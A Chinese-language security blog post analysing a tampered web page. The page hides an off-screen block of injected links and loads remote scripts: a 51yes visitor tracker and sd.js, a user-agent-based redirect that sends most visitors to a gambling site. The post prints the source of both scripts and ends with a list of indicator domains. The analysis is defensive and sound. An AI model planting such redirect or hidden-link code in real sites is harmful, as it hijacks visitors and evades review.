页面篡改分析：一处 BoCai（博彩）跳转页面

XT 2020-06-11 23:23:00

BoCai网站分析

样本基本情况

本次样本如下:

<!-- Third-party 51yes visit counter (id=51378275). It collects visitor data; the click.aspx script is analysed below. -->
<script language="javascript" src="http://count5.51yes.com/click.aspx?id=51378275&logo=1" charset="gb2312"></script>
<!-- Remote script from 616321.com. This file was no longer reachable when the sample was analysed; sd.js from the same host (see below) is presumably equivalent — unverified. -->
<script src=http://www.616321.com/1.js ></script>
......
<!-- Injected link block pushed off-screen with position:fixed; left:-3000px; top:-3000px, so a human visitor never sees it. Likely SEO link injection for crawlers (inference from the styling, not confirmed). -->
<body><div class="z7z8z9z6" style="position:fixed;left:-3000px;top:-3000px;">
<li><a href='http://www.kfqrlzy.com/20181223241252775444.html'>http://www.kfqrlzy.com/20181223241252775444.html</a></li>
......
<!-- Closing tag as captured in the sample; a class attribute on a closing tag is not valid HTML. -->
</div class="z7z8z9z6">
......

概要分析

0x01 http://count5.51yes.com/click.aspx?id=51378275&logo=1

该脚本收集访问者信息并通过隐藏 iframe 发送到 http://count5.51yes.com/sa.htm 做统计，属于访客画像与身份识别行为。需要注意的是，51yes 是常见的第三方网站统计服务，单独出现并不能说明页面被篡改；但其统计 id 可作为关联线索（本样本使用 id=51378275，下文二级页面使用 id=191757168）。

// Returns the slice of document.cookie starting at offset `iz` and ending just
// before the next ';' — or at the end of the cookie string when no ';' follows.
// Used by y_g() to extract a cookie value once the "name=" prefix was located.
function y_gVal(iz){
  var cookieStr = document.cookie;
  var stop = cookieStr.indexOf(";", iz);
  return cookieStr.substring(iz, stop === -1 ? cookieStr.length : stop);
}
// Looks up cookie `name` in document.cookie and returns its raw (still escaped)
// value, or null when it is absent. The scan only tests positions that follow a
// space (plus offset 0) for the prefix "name=", so a cookie whose name ends with
// `name` is not confused with it, but nothing else is validated — this mirrors
// the original's behaviour exactly.
function y_g(name){
  var prefix = name + "=";
  var cookieStr = document.cookie;
  for (var pos = 0; pos < cookieStr.length; ) {
    var after = pos + prefix.length;
    if (cookieStr.substring(pos, after) === prefix) {
      // Value runs up to the next ';' or to the end of the cookie string.
      var stop = cookieStr.indexOf(";", after);
      return cookieStr.substring(after, stop === -1 ? cookieStr.length : stop);
    }
    var nextSpace = cookieStr.indexOf(" ", pos);
    if (nextSpace === -1) break;
    pos = nextSpace + 1;
  }
  return null;
}
// Maintains a per-visitor visit counter in two first-party cookies and returns it:
//   cck_lasttime : ms timestamp of the last visit that was counted
//   cck_count    : number of counted visits
// A new visit is counted only when more than `yesvisitor` ms have elapsed since
// cck_lasttime. The result feeds the `returning` field of the tracking beacon
// built below. Returns 0 on the first visit (cookies just seeded), else the count.
function cc_k(){
var y_e=new Date();
// y_t = cookie lifetime: 93,312,000 ms ≈ 25.9 hours.
// yesvisitor = 36,000,000 ms = 10 hours: minimum gap between two counted visits.
var y_t=93312000;var yesvisitor=1000*36000;
var yesctime=y_e.getTime();
// y_e is reused as the expiry date for both cookies.
y_e.setTime(y_e.getTime()+y_t);
// Plain substring search: any cookie whose name merely contains "cck_lasttime" counts as present.
var yesiz=document.cookie.indexOf("cck_lasttime");
if(yesiz==-1){
// First visit: seed both cookies site-wide (path=/) and report 0.
document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";
document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;
}
else{
var y_c1=y_g("cck_lasttime");
var y_c2=y_g("cck_count");
// No radix passed; the values were (presumably) written by this same code as decimal digits.
y_c1=parseInt(y_c1);
y_c2=parseInt(y_c2);
// NOTE(review): y_c3 is assigned without var, so it leaks as a global in this sloppy-mode script.
y_c3=yesctime-y_c1;
if(y_c3>yesvisitor){
// Enough time has passed: bump the count and refresh both cookies' expiry.
y_c2=y_c2+1;
document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";
document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";
}
return y_c2;
}
}
// Beacon payload: the string below is appended verbatim to the sa.htm query string.
var yesdata;
// Fields: refe = document.referrer, location = current page URL, color = screen colour depth,
// resolution = WxH, returning = visit count from cc_k() (which also writes the cck_* cookies),
// language = navigator.systemLanguage (non-standard, IE-only as far as I know; elsewhere it is
// undefined and the literal string "undefined" is sent — worth confirming), ua = full User-Agent.
// Values are encoded with the legacy escape(), not encodeURIComponent().
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
// Visible 20x20 counter badge linking to the 51yes stats page for this id.
document.write('<a href="http://countt.51yes.com/index.aspx?id=51378275" target=_blank><img width=20 height=20 border=0 hspace=0 vspace=0 src="http://count5.51yes.com/count1.gif" alt="51YES网站统计系统"></a>');
// Hidden 0x0 iframe: this request is what actually ships yesdata to count5.51yes.com.
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count5.51yes.com/sa.htm?id=51378275'+yesdata+' height=0 width=0></iframe>');

根据源码，可知收集的信息有：Referer、User-Agent、当前页面 URL（document.location）、屏幕色深、屏幕分辨率、系统语言，以及由 cck_lasttime / cck_count 两个 Cookie 维护的回访计数（returning 字段）。最后将这些信息拼接成 yesdata 查询串，通过 document.write 写入一个 0×0 的隐藏 iframe，发送到 count5.51yes.com/sa.htm 记录。

0x02 http://www.616321.com/1.js(已无法访问)
0x03 http://www.kfqrlzy.com/20181223241252775444.html
<!-- Same 51yes counter as on the top-level page, but under a different id (191757168); the first tag is not closed in the captured sample. The second tag loads the redirect script sd.js from 616321.com, whose source is reproduced below. -->
<script language="javascript" src="http://count19.51yes.com/click.aspx?id=191757168&logo=1" charset="gb2312">
<script type="text/javascript" src="http://www.616321.com/sd.js"></script>

分析可知http://count19.51yes.com/click.aspx?id=191757168&logo=1同上统计作用。
http://www.616321.com/sd.js 源码如下。由于 1.js 已无法获取，推测其与 sd.js 功能相同，但未能验证。

var sUserAgent= navigator.userAgent.toLowerCase();
var bIsIphoneOs= sUserAgent.match(/iphone/i) == "iphone";
var bIsSymb= sUserAgent.match(/symbianos/i) == "symbianos";
var bIsIpad= sUserAgent.match(/ipad/i) == "ipad";
var bIsIpod= sUserAgent.match(/ipod/i) == "ipod";
var bIsAndroid= sUserAgent.match(/android/i) == "android";
var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce";
var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile";
var bIsWP= sUserAgent.match(/windows phone/i) == "windows phone";

var isBDAPP=sUserAgent.match(/baiduboxapp/i) == "baiduboxapp";
var isBDBrowser=sUserAgent.match(/baidubrowser/i) == "baidubrowser";
var isM= bIsIphoneOs || bIsSymb || bIsIpad || bIsIpod || bIsAndroid || bIsCE || bIsWM || bIsWP;

if (!isM || (!isBDAPP && !isBDBrowser)){
window.location.href="http://www.450378.com/?a=592088";

可知该脚本在执行时对 UA 进行判断：isM 标记移动端 UA，isBDAPP / isBDBrowser 标记百度 App 与百度浏览器。跳转条件 `!isM || (!isBDAPP && !isBDBrowser)` 的含义是：所有桌面端访问者，以及不是通过百度 App / 百度浏览器访问的移动端用户，都会被 window.location.href 跳转到 BoCai 网站 http://www.450378.com/?a=592088；只有百度 App / 百度浏览器的移动端 UA 被排除在跳转之外（推测是为了规避百度移动端的审查或安全检测，未经证实）。

最终效果：除百度 App / 百度浏览器 UA 之外的访问者都会被引导到 BoCai 网站。就可见的脚本片段而言，跳转不依赖 Referer，也没有其他来源判断。

IOCs

count5.51yes.com（第三方统计服务，仅作关联线索，不宜单独作为阻断依据；本样本 id=51378275，二级页面使用 count19.51yes.com、id=191757168）
www.616321.com（托管跳转脚本 1.js / sd.js）
www.450378.com（跳转目标 BoCai 站点，落地 URL 带推广参数 a=592088，可作为关联线索）
www.kfqrlzy.com（隐藏 div 中注入的外链目标页，同样挂载 616321.com 的脚本）